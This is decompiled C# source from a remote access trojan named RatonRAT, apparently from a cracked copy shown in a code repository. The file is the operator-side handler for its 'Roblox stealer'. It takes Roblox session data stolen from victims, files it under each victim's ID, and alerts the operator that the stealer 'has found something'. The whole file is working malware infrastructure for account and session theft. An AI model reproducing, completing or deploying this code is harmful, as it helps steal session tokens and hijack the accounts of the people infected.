Files
2026-08-27 11:23:13 -06:00

39 lines
1.5 KiB
C#

// Decompiled with JetBrains decompiler
// Type: Server.Handlers.HandleRoblox
// Assembly: Raton, Version=0.4.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 36C4E416-7F8D-4D23-930F-B5CCB0D810E7
// Assembly location: C:\Users\user\Desktop\v3.8.0 Deluxe Plugins (v4.0.0) cracked\Raton.exe
using Raton.Windows;
using Server.Connection;
using Stuff;
using System;
using System.IO;
#nullable disable
namespace Server.Handlers;
internal class HandleRoblox
{
public HandleRoblox(SillyClient client, Unpack unpack)
{
try
{
string asString = unpack.GetAsString("UID");
string contents = unpack.GetAsString("Message").Replace("\\r\\n", "\n").Replace("\\n", "\n").Replace("\\t", "\t");
if (string.IsNullOrEmpty(asString) || string.IsNullOrEmpty(contents))
return;
string str1 = Path.Combine(Program.ClientsFolder, asString);
if (!Directory.Exists(str1))
Directory.CreateDirectory(str1);
string str2 = DateTime.Now.ToString("yyyy-MM-dd_HH-mm-ss");
File.WriteAllText(Path.Combine(str1, $"RobloxSession_{str2}.txt"), contents);
Program.form2.Dispatcher.Invoke((Action) (() => Program.form2.AddSuccessLog((object) "Got the Roblox sessions", (object) System.Drawing.Color.LightGreen)));
Notification.Show($"RatonRAT • {unpack.GetAsString("UID")}\nRoblox stealer has found something", "\uE946", new System.Windows.Media.Color?(System.Windows.Media.Color.FromArgb(byte.MaxValue, byte.MaxValue, (byte) 237, (byte) 41)));
}
catch
{
}
}
}